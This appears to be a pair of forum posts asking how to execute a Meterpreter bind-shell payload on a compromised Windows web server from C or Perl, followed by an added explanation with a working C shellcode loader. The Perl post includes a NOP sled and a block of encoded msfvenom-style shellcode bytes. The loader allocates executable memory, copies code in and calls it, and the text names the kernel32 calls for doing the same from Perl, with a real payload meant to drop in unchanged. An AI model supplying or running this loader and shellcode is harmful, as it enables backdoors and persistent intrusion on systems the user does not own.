

Messages - sopinha

1
Let's say I am pentesting a Windows web server and somehow get a PHP shell. Now, the owner of the Apache server is not System, so I want to elevate privileges somehow. I try to run a binary on the target machine containing a Meterpreter payload, which I compiled from the C code:

Code:
// Our Meterpreter code goes here (the raw msfvenom output as "\x..\x.." escaped bytes)
unsigned char payload[]="<shellcode>";

// Push Meterpreter into memory: cast the byte array to a function pointer and call it
// (this only works if the array's data section is mapped executable)
int main(void) { ((void (*)())payload)(); }

Where <shellcode> refers to the code obtained from msfvenom to initiate a Meterpreter bind TCP handler on the target machine, which will listen for incoming connections.
But as I try to run this binary, I notice that I don't have enough privileges to run it, and there is no folder on the server from which I can run it. So then I notice the server has Perl installed, and I wonder: if I run a Perl script that behaves the same way as the compiled C code I tried to execute, would it be possible to create the backdoor directly from the script?
So my main question here is: is there any way to emulate the cast ((void (*)()) in Perl to push the payload into memory?


2
I was wondering if it was possible to run a payload directly from the execution of a Perl script on a compromised machine (with Perl installed).

Having the following code, how do I run the contents of $shellcode from the script?

Code:
use strict;
use warnings;

# Padding left over from an overflow template; not used below.
my $junk = "\x90" x 504;

# NOP sled, followed by the msfvenom-generated payload bytes.
my $shellcode="\x90" x 50;

$shellcode=$shellcode.
"\xba\xce\xb2\xa4\x42\xdd\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" .
"\xb1\x4a\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\x3b\x4e" .
"\x4c\xc4\xc3\xaf\x8d\xa9\x4a\x4a\xbc\xfb\x28\x1e\xed\xcb" .
"\x3b\x72\x1e\xa7\x69\x67\x95\xc5\xa5\x88\x1e\x63\x93\xa7" .
"\x9f\x45\x1b\x6b\x63\xc7\xe7\x76\xb0\x27\xd6\xb8\xc5\x26" .
"\x1f\xa4\x26\x7a\xc8\xa2\x95\x6b\x7d\xf6\x25\x07\xcd\xe7" .
"\x2d\xf4\x87\x06\x1f\xab\x9c\x50\xbf\x4d\x71\xe9\xf6\x55" .
"\x96\xd2\x41\xed\x6c\xa0\x53\x27\xbd\x49\x62\x07\x11\x74" .
"\x4a\x8a\x68\xb0\x6d\x75\x1f\xca\x8d\x08\x27\x09\xef\xd6" .
"\xa2\x8c\x57\x9c\x14\x75\x69\x71\xc2\xfe\x65\x3e\x81\x59" .
"\x6a\xc1\x46\xd2\x96\x4a\x69\x35\x1f\x08\x4d\x91\x7b\xca" .
"\xec\x80\x21\xbd\x11\xd2\x8e\x62\xb7\x98\x3d\x76\xce\xc2" .
"\x29\xbb\xe2\xfc\xa9\xd3\x75\x8e\x9b\x7c\x2d\x18\x90\xf5" .
"\xeb\xdf\xd7\x2f\x4b\x4f\x26\xd0\xab\x59\xed\x84\xfb\xf1" .
"\xc4\xa4\x90\x01\xe8\x70\x36\x52\x46\x2b\xf6\x02\x26\x9b" .
"\x9e\x48\xa9\xc4\xbe\x72\x63\x6d\x0f\x56\xdf\xfa\x6d\x68" .
"\xf1\xa6\xf8\x8e\x9b\x46\xac\x19\x34\xa5\x8b\x91\xa3\xd6" .
"\xfe\x8d\x7c\x41\xb7\xdb\xbb\x6e\x48\xce\xef\xc3\xe1\x99" .
"\x7b\x08\x36\xbb\x7b\x05\x1f\xac\xec\xd3\xf1\x9f\x8d\xe4" .
"\xd8\x4a\x4e\x71\xe6\xdc\x19\xed\xe4\x39\x6d\xb2\x17\x6c" .
"\xe5\x7b\x8d\xcf\x92\x83\x41\xd0\x62\xd2\x0b\xd0\x0a\x82" .
"\x6f\x83\x2f\xcd\xba\xb7\xe3\x58\x44\xee\x50\xca\x2c\x0c" .
"\x8e\x3c\xf3\xef\xe5\xbc\xc8\x39\xc0\x3a\x38\x4c\x20\x87";
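Both posts above ask the same thing: how the C cast ((void (*)())payload)() actually works, and how to do the equivalent from Perl. What follows is an added example written for this page; it is not code from either post and not Metasploit's own code. It shows the cast done correctly in C. The array in the first post lives in the program's data section, which is non-executable under DEP/NX on current Windows and Linux builds, so the call faults before the payload ever runs; the fix is the usual three steps of allocating memory that is mapped executable, copying the bytes in, then casting and calling. On Windows the Perl equivalent is the same three steps made through the Win32::API module against kernel32 (VirtualAlloc, RtlMoveMemory, CreateThread); the C below shows what those calls have to achieve. The stub bytes here are constructed for the example (they just return 42 so the run can be checked); a real msfvenom payload would be dropped in unchanged. One caveat a tester should keep in mind: a payload launched from the web server's process yields a session as that same account, not as System, so this answers the "how do I run it" question but does not by itself elevate privileges.

```c
/* Added example: load position-independent code into executable memory
 * and call it through a function pointer.  Not from the original posts.
 * The stub is constructed for this example and simply returns 42.
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
/* mov eax, 42 ; ret */
static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
#elif defined(__aarch64__) || defined(_M_ARM64)
/* mov w0, #42 ; ret */
static const unsigned char stub[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 };
#else
#error "no stub for this architecture"
#endif

typedef int (*entry_fn)(void);

/* Step 1 and 2: allocate an RWX region and copy len bytes of code into it.
 * Returns the region or NULL.  This is what the bare array in the first
 * post lacks: a mapping with the execute permission actually set. */
void *load_code(const unsigned char *code, size_t len) {
#ifdef _WIN32
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return NULL;
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
#endif
    memcpy(mem, code, len);
#if defined(__GNUC__)
    /* Needed on architectures with separate I/D caches (aarch64); harmless on x86. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
#endif
    return mem;
}

void free_code(void *mem, size_t len) {
#ifdef _WIN32
    (void)len;
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    munmap(mem, len);
#endif
}

/* Step 3: the cast the first post asks about, applied to memory that is
 * really executable.  Returns whatever the code returns, or -1 on
 * allocation failure. */
int run_stub(void) {
    void *mem = load_code(stub, sizeof stub);
    if (mem == NULL) return -1;
    int rc = ((entry_fn)mem)();
    free_code(mem, sizeof stub);
    return rc;
}

int main(void) {
    int rc = run_stub();
    printf("stub returned %d\n", rc);
    return rc == 42 ? 0 : 1;
}
```

Build with cc -o loader loader.c on Linux, or with the MSVC or MinGW toolchain on Windows; the same source compiles on both because only the allocation call differs. A Meterpreter bind payload pasted in place of the stub never returns, so in that case the free_code call is unreachable and a real loader would typically launch the code on its own thread instead.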
